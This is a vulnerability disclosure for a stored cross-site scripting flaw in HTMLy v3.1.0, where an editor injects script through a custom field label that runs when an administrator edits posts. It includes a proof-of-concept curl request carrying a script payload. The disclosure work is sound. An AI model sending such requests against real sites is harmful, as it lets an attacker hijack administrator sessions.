Vendor : https://github.com/danpros/htmly/

Products : htmly

version: 3.1.0

Class: XSS

Affected Versions: htmly v3.1.0

Impact: This vulnerability allows an attacker to execute arbitrary JavaScript in the victim’s browser, enabling session hijacking, phishing, or redirection to malicious sites.

Description

HTMLy v3.1.0 contains a stored cross-site scripting (XSS) vulnerability whereby an editor can inject malicious scripts through the label parameter within the custom fields page, resulting in the execution of arbitrary web scripts or HTML code when an administrator subsequently creates new blog posts or edits existing posts.

Stored XSS Affected URL:

1. Input - http://127.0.0.1:8082/htmly/admin/field/post (system/htmly.php)
2. Output - system/admin/views/add-content.html.php, system/admin/views/edit-content.html.php

PoC:

curl -i -s -k -X POST \\

    -H "Host: 127.0.0.1:8082" \\
    -H "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" \\
    -H "X-Requested-With: XMLHttpRequest" \\
    -b "PHPSESSID=0gu56vfpv6dllgqe5uge3s422p" \\
    --data-binary 'json=%5b%0a%20%20%7b%0a%20%20%20%20%22type%22%3a%20%22text%22%2c%0a%20%20%20%20%22name%22%3a%20%22xss-poc%22%2c%0a%20%20%20%20%22label%22%3a%20%22%3cscript%3ealert(1)%3c%2fscript%3e%22%2c%0a%20%20%20%20%22value%22%3a%20%22%22%2c%0a%20%20%20%20%22info%22%3a%20%22%22%0a%20%20%7d%0a%5d' \\
    "http:[Your domain]/htmly/admin/field/post"

Description

1. editor user login.

1. post edit.